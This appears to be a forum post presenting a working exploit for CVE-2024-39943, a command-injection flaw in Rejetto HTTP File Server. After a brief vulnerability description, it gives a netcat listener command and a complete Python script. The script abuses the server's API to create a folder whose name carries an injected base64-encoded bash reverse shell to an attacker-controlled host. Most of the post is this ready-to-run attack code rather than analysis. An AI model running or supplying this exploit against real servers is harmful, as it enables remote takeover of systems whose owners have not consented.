Remote RCE, Rejetto HFS (aka HTTP File Server), CVE-2024-39943

[blackhunt]

CVE-2024-39943 Exploit​

NVD - CVE-2024-39943

nvd.nist.gov

0x01 Vulnerability description​

Rejetto HFS (aka HTTP File Server) versions earlier than 0.52.10 on Linux, UNIX, and macOS contain a vulnerability that allows remote authenticated users to execute operating system commands if they have upload permissions. This is because the shell is used to execute the df command, specifically using execSync instead of spawnSync in the child_process of Node.js to execute the command.

0x02 Scope of influence​

Rejetto HTTP File Server Server 3 在Linux、UNIX和macOS上的版本低于0.52.10存在一个漏洞

0x03 Vulnerability Exploitation​

Attack machine sets listening port

nc -lvvp 9999

Execute script

python3 CVE-2024-39943.py

Github : https://github.com/A-little-dragon/CVE-2024-39943-Exploit

import base64
from datetime import datetime
import requests
import colorama


def showMsg():
    colorama.init()
    return (colorama.Fore.RED + rf"""
  ______     _______     ____   ___ ____  _  _        _____ ___   ___  _  _    _____
 / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ // _ \ / _ \| || |  |___ /
| |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ |_ \ (_) | (_) | || |_   |_ \
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____|__) \__, |\__, |__   _| ___) |
 \____|  \_/  |_____|   |_____|\___/_____|  |_|      |____/  /_/   /_/   |_|  |____/
 
                                                            {colorama.Fore.CYAN}By：{colorama.Fore.MAGENTA}A-little-dragon
                                                            {colorama.Fore.CYAN}Team：{colorama.Fore.MAGENTA}TracelessSec
                                                            {colorama.Fore.CYAN}Github：{colorama.Fore.MAGENTA}https://github.com/A-little-dragon
    """ + "\033[0m")


def GetTime():
    return datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')


def start():
    print(showMsg())
    url = input("Set Target URL > ")
    cookie = input("Set Target Cookie > ")
    vps_ip = input("Set VPS IP > ")
    vps_port = input("Set VPS PORT > ")
    headers = {"x-hfs-anti-csrf": "1", "Cookie": cookie}
    print(f"[*] {GetTime()} Start executing the attack program!")
    try:
        requests.post(url=url + "~/api/add_vfs", headers=headers, json={"parent": "/", "source": "/tmp"})
        print(f"[+] {GetTime()} Endpoint add_vfs executed successfully!")
        requests.post(url=url + "~/api/set_vfs", headers=headers, json={"uri": "/tmp/",
                                                                        "props": {"can_see": None, "can_read": None,
                                                                                  "can_list": None, "can_upload": "*",
                                                                                  "can_delete": None,
                                                                                  "can_archive": None,
                                                                                  "source": "/tmp", "name": "tmp",
                                                                                  "type": "folder", "masks": None}})
        print(f"[+] {GetTime()} Endpoint set_vfs executed successfully!")
        command = f"bash -i >& /dev/tcp/{vps_ip}/{vps_port} 0>&1"
        payload = 'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\'' + base64.b64encode(
            command.encode()).decode() + '\'))'
        requests.post(url=url + "~/api/create_folder", headers=headers, json={"uri": "/tmp/", "name": payload})
        print(f"[+] {GetTime()} Endpoint create_folder executed successfully!")
        print(f"[*] {GetTime()} The attack is completed, please check the attack results yourself!")
        requests.put(url=url + "/tmp/" + payload + "/123.txt", headers=headers, data="aaaaaaa")
    except Exception as e:
        print(f"[-] {GetTime()} The attack failed! wrong reason：", e)


if __name__ == '__main__':

    start()